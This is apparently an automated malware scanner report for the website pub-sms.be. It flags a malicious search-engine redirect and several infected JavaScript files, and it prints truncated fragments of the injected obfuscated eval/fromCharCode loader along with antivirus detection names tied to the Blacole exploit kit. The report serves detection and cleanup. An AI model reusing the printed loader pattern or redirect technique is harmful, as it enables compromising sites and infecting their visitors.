Malware Scanner report for pub-sms.be

Malicious/Suspicious/Total urls checked: 9/0/15

9 pages have malicious code. See details below

Blacklists: OK

Malicious redirects: Found

The website redirects visitors from search engines to the 3rd-party URL:
->http://www.ergosoft.info/clik.php
16 websites infected.

The website "pub-sms.be" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

Request	Server response	Status
URL: http://pub-sms.be/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: pub-sms.be Referer: http://www.google.com/search?q=redirect+check1	HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 08:27:08 GMT Location: http://www.ergosoft.info/clik.php Server: Apache/1.3.37 (Unix) mod_gzip/1.3.19.1a PHP/4.4.4 mod_ssl/2.8.28 OpenSSL/0.9.6m Content-Type: text/html; charset=iso-8859-1	malicious

Scanned pages/files

Request	Server response	Status
http://pub-sms.be/	200 OK Content-Length: 8290 Content-Type: text/html	clean
http://pub-sms.be/./Content/../Script/Default.js	200 OK Content-Length: 8093 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ns4 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)==4);ns5 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)>=5);ie4 =(navigator.appName =="Microsoft Internet Explorer"&&parseInt(navigator.appVersion)>=4);ie5 =(navigator.appVersion.indexOf('MSIE 5')>0);ie6 =(navigator.appVersion.indexOf('MSIE 6')>0);ElById =document.getElementById;if(ns5){window.captureEvents(Event.Click);window.onclick=OnClick_NS5;event=new Object();}function ... 6986 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i =1){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUT [Trj] Ad-Aware Trojan.Script.489524 Ikarus Virus.HTML.Framer nProtect Trojan.Script.489524 TrendMicro-HouseCall JS_BLACOLE.SMVD Comodo TrojWare.JS.Blacole.AD Emsisoft Trojan.Script.489524 (B) CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.454 TrendMicro JS_BLACOLE.SMVD Microsoft Trojan:JS/BlacoleRef.CZ MicroWorld-eScan Trojan.Script.489524 Fortinet JS/Redirector.BOZ!tr McAfee JS/Exploit-Blacole.ht F-Secure Trojan.Script.489524 AVG HTML/Framer Norman Downloader.HITK GData Trojan.Script.489524 Symantec Trojan.Webkit!html BitDefender Trojan.Script.489524
http://pub-sms.be/./Content/../Script/SubMenu.js	200 OK Content-Length: 9007 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var SM_Bounding_Rect;var SM_Bounding_Top;var SM_Bounding_Bottom;var SM_Bounding_Left;var SM_Bounding_Right;var SM_Visible=0;var SM_Obj;var SM_Text=new Array();var SM_Link=new Array();var a=0;var b=0;var OutTime=0;var SubMenuTimeOut=500;ns4 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)==4);ns5 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)>=5);ie4 =(navigator.appName =="Microsoft Internet Explorer"&&parseInt(navigator.appVersion)> ... 7942 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i =1){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUT [Trj] Ad-Aware Trojan.Script.489524 nProtect Trojan.Script.489524 TrendMicro-HouseCall JS_BLACOLE.SMVD Comodo TrojWare.JS.Blacole.AD Emsisoft Trojan.Script.489524 (B) CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.454 TrendMicro JS_BLACOLE.SMVD Microsoft Trojan:JS/BlacoleRef.CZ MicroWorld-eScan Trojan.Script.489524 Fortinet JS/Redirector.BOZ!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.bsywaz F-Secure Trojan.Script.489524 AVG HTML/Framer Norman Downloader.HITK GData Trojan.Script.489524 Symantec Trojan.Webkit!html BitDefender Trojan.Script.489524
http://www.google-analytics.com/urchin.js	200 OK Content-Length: 22678 Content-Type: text/javascript	clean
http://pub-sms.be/./Content/../C/Fr/DrEditor/Accueil.html	200 OK Content-Length: 6704 Content-Type: text/html	clean
http://pub-sms.be/./Content/../C/Fr/DrEditor/../../../Content/../Script/Default.js	200 OK Content-Length: 8093 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ns4 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)==4);ns5 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)>=5);ie4 =(navigator.appName =="Microsoft Internet Explorer"&&parseInt(navigator.appVersion)>=4);ie5 =(navigator.appVersion.indexOf('MSIE 5')>0);ie6 =(navigator.appVersion.indexOf('MSIE 6')>0);ElById =document.getElementById;if(ns5){window.captureEvents(Event.Click);window.onclick=OnClick_NS5;event=new Object();}function ... 6986 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i =1){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUT [Trj] Ad-Aware Trojan.Script.489524 Ikarus Virus.HTML.Framer nProtect Trojan.Script.489524 TrendMicro-HouseCall JS_BLACOLE.SMVD Comodo TrojWare.JS.Blacole.AD Emsisoft Trojan.Script.489524 (B) CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.454 TrendMicro JS_BLACOLE.SMVD Microsoft Trojan:JS/BlacoleRef.CZ MicroWorld-eScan Trojan.Script.489524 Fortinet JS/Redirector.BOZ!tr McAfee JS/Exploit-Blacole.ht F-Secure Trojan.Script.489524 AVG HTML/Framer Norman Downloader.HITK GData Trojan.Script.489524 Symantec Trojan.Webkit!html BitDefender Trojan.Script.489524
http://pub-sms.be/./Content/../C/Fr/DrEditor/../../../Content/../Script/SubMenu.js	200 OK Content-Length: 9007 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var SM_Bounding_Rect;var SM_Bounding_Top;var SM_Bounding_Bottom;var SM_Bounding_Left;var SM_Bounding_Right;var SM_Visible=0;var SM_Obj;var SM_Text=new Array();var SM_Link=new Array();var a=0;var b=0;var OutTime=0;var SubMenuTimeOut=500;ns4 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)==4);ns5 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)>=5);ie4 =(navigator.appName =="Microsoft Internet Explorer"&&parseInt(navigator.appVersion)> ... 7942 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i =1){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUT [Trj] Ad-Aware Trojan.Script.489524 nProtect Trojan.Script.489524 TrendMicro-HouseCall JS_BLACOLE.SMVD Comodo TrojWare.JS.Blacole.AD Emsisoft Trojan.Script.489524 (B) CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.454 TrendMicro JS_BLACOLE.SMVD Microsoft Trojan:JS/BlacoleRef.CZ MicroWorld-eScan Trojan.Script.489524 Fortinet JS/Redirector.BOZ!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.bsywaz F-Secure Trojan.Script.489524 AVG HTML/Framer Norman Downloader.HITK GData Trojan.Script.489524 Symantec Trojan.Webkit!html BitDefender Trojan.Script.489524
http://pub-sms.be/./Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/Accueil.html	200 OK Content-Length: 6704 Content-Type: text/html	clean
http://pub-sms.be/./Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../Script/Default.js	200 OK Content-Length: 8093 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ns4 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)==4);ns5 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)>=5);ie4 =(navigator.appName =="Microsoft Internet Explorer"&&parseInt(navigator.appVersion)>=4);ie5 =(navigator.appVersion.indexOf('MSIE 5')>0);ie6 =(navigator.appVersion.indexOf('MSIE 6')>0);ElById =document.getElementById;if(ns5){window.captureEvents(Event.Click);window.onclick=OnClick_NS5;event=new Object();}function ... 6986 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i =1){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUT [Trj] Ad-Aware Trojan.Script.489524 Ikarus Virus.HTML.Framer nProtect Trojan.Script.489524 TrendMicro-HouseCall JS_BLACOLE.SMVD Comodo TrojWare.JS.Blacole.AD Emsisoft Trojan.Script.489524 (B) CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.454 TrendMicro JS_BLACOLE.SMVD Microsoft Trojan:JS/BlacoleRef.CZ MicroWorld-eScan Trojan.Script.489524 Fortinet JS/Redirector.BOZ!tr McAfee JS/Exploit-Blacole.ht F-Secure Trojan.Script.489524 AVG HTML/Framer Norman Downloader.HITK GData Trojan.Script.489524 Symantec Trojan.Webkit!html BitDefender Trojan.Script.489524
http://pub-sms.be/./Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../Script/SubMenu.js	200 OK Content-Length: 9007 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var SM_Bounding_Rect;var SM_Bounding_Top;var SM_Bounding_Bottom;var SM_Bounding_Left;var SM_Bounding_Right;var SM_Visible=0;var SM_Obj;var SM_Text=new Array();var SM_Link=new Array();var a=0;var b=0;var OutTime=0;var SubMenuTimeOut=500;ns4 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)==4);ns5 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)>=5);ie4 =(navigator.appName =="Microsoft Internet Explorer"&&parseInt(navigator.appVersion)> ... 7942 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i =1){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUT [Trj] Ad-Aware Trojan.Script.489524 nProtect Trojan.Script.489524 TrendMicro-HouseCall JS_BLACOLE.SMVD Comodo TrojWare.JS.Blacole.AD Emsisoft Trojan.Script.489524 (B) CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.454 TrendMicro JS_BLACOLE.SMVD Microsoft Trojan:JS/BlacoleRef.CZ MicroWorld-eScan Trojan.Script.489524 Fortinet JS/Redirector.BOZ!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.bsywaz F-Secure Trojan.Script.489524 AVG HTML/Framer Norman Downloader.HITK GData Trojan.Script.489524 Symantec Trojan.Webkit!html BitDefender Trojan.Script.489524
http://pub-sms.be/./Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/Accueil.html	200 OK Content-Length: 6704 Content-Type: text/html	clean
http://pub-sms.be/./Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../Script/Default.js	200 OK Content-Length: 8093 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ns4 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)==4);ns5 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)>=5);ie4 =(navigator.appName =="Microsoft Internet Explorer"&&parseInt(navigator.appVersion)>=4);ie5 =(navigator.appVersion.indexOf('MSIE 5')>0);ie6 =(navigator.appVersion.indexOf('MSIE 6')>0);ElById =document.getElementById;if(ns5){window.captureEvents(Event.Click);window.onclick=OnClick_NS5;event=new Object();}function ... 6986 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i =1){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUT [Trj] Ad-Aware Trojan.Script.489524 Ikarus Virus.HTML.Framer nProtect Trojan.Script.489524 TrendMicro-HouseCall JS_BLACOLE.SMVD Comodo TrojWare.JS.Blacole.AD Emsisoft Trojan.Script.489524 (B) CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.454 TrendMicro JS_BLACOLE.SMVD Microsoft Trojan:JS/BlacoleRef.CZ MicroWorld-eScan Trojan.Script.489524 Fortinet JS/Redirector.BOZ!tr McAfee JS/Exploit-Blacole.ht F-Secure Trojan.Script.489524 AVG HTML/Framer Norman Downloader.HITK GData Trojan.Script.489524 Symantec Trojan.Webkit!html BitDefender Trojan.Script.489524
http://pub-sms.be/./Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../Script/SubMenu.js	200 OK Content-Length: 9007 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var SM_Bounding_Rect;var SM_Bounding_Top;var SM_Bounding_Bottom;var SM_Bounding_Left;var SM_Bounding_Right;var SM_Visible=0;var SM_Obj;var SM_Text=new Array();var SM_Link=new Array();var a=0;var b=0;var OutTime=0;var SubMenuTimeOut=500;ns4 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)==4);ns5 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)>=5);ie4 =(navigator.appName =="Microsoft Internet Explorer"&&parseInt(navigator.appVersion)> ... 7942 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i =1){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUT [Trj] Ad-Aware Trojan.Script.489524 nProtect Trojan.Script.489524 TrendMicro-HouseCall JS_BLACOLE.SMVD Comodo TrojWare.JS.Blacole.AD Emsisoft Trojan.Script.489524 (B) CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.454 TrendMicro JS_BLACOLE.SMVD Microsoft Trojan:JS/BlacoleRef.CZ MicroWorld-eScan Trojan.Script.489524 Fortinet JS/Redirector.BOZ!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.bsywaz F-Secure Trojan.Script.489524 AVG HTML/Framer Norman Downloader.HITK GData Trojan.Script.489524 Symantec Trojan.Webkit!html BitDefender Trojan.Script.489524
http://pub-sms.be/./Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/Accueil.html	200 OK Content-Length: 6704 Content-Type: text/html	clean
http://pub-sms.be/./Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../C/Fr/DrEditor/../../../Content/../Script/Default.js	200 OK Content-Length: 8093 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ns4 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)==4);ns5 =(navigator.appName =="Netscape"&&parseInt(navigator.appVersion)>=5);ie4 =(navigator.appName =="Microsoft Internet Explorer"&&parseInt(navigator.appVersion)>=4);ie5 =(navigator.appVersion.indexOf('MSIE 5')>0);ie6 =(navigator.appVersion.indexOf('MSIE 6')>0);ElById =document.getElementById;if(ns5){window.captureEvents(Event.Click);window.onclick=OnClick_NS5;event=new Object();}function ... 6986 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i =1){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: Qihoo-360 Trojan.Generic AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUT [Trj] Ad-Aware Trojan.Script.489524 Ikarus Virus.HTML.Framer nProtect Trojan.Script.489524 TrendMicro-HouseCall JS_BLACOLE.SMVD Comodo TrojWare.JS.Blacole.AD Emsisoft Trojan.Script.489524 (B) CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.454 TrendMicro JS_BLACOLE.SMVD Microsoft Trojan:JS/BlacoleRef.CZ MicroWorld-eScan Trojan.Script.489524 Fortinet JS/Redirector.BOZ!tr McAfee JS/Exploit-Blacole.ht F-Secure Trojan.Script.489524 AVG HTML/Framer Norman Downloader.HITK GData Trojan.Script.489524 Symantec Trojan.Webkit!html BitDefender Trojan.Script.489524

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=pub-sms.be

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://pub-sms.be/

Result: pub-sms.be is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for pub-sms.be

Malware & Hack Repair

Website Hack Insurance

Malicious/Suspicious Redirects

Scanned pages/files

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools